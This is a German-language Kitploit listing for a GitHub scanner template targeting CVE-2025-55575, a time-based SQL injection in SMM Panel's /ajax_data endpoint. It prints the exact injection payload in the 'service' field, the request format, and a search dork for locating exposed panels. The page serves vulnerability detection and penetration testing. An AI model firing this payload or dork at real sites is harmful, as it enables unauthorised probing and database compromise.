Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55575 — Zeitbasierte SQL-Injection-Erkennungsvorlage für SMM Panel. Sendet maßgeschneiderte POST-Anfragen an `/ajax_data` und erkennt verwundbare Endpunkte durch Analyse der Antwortverzögerung. | Kitploit
Tools/GitHubGitHub/aether-0/cve-2025-55575
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubaether-0/cve-2025-55575

CVE-2025-55575

Zeitbasierte SQL-Injection-Erkennungsvorlage für SMM Panel. Sendet maßgeschneiderte POST-Anfragen an `/ajax_data` und erkennt verwundbare Endpunkte durch Analyse der Antwortverzögerung.

Repository anzeigen
vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

smm-panel-sqli(CVE-2025-55575)

Zeitbasierte SQL-Injection-Erkennung für SMM Panel


Übersicht

Diese Vorlage erkennt eine zeitbasierte SQL-Injection-Schwachstelle im Parameter service_detail des SMM Panels über HTTP-POST-Anfragen an /ajax_data. Ausnutzung kann es entfernten Angreifern ermöglichen, auf sensible Daten zuzugreifen oder Berechtigungen zu erweitern.

  • Autor: Aether
  • Schweregrad: Kritisch
  • Tags: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Referenz: https://owasp.org/www-community/attacks/SQL_Injection

Erkennungslogik

Das Tool sendet eine präparierte POST-Anfrage:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

Wenn die Antwortzeit größer als 5 Sekunden ist, deutet dies auf einen anfälligen Endpunkt hin.

Erkennungsbeispiel

root@kitploit:~
- Methode: POST
- Pfad: {{BaseURL}}/ajax_data
- Header: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: Dauer > 5 Sekunden

Video-Demo

SQLi PoC

Tool herunterladen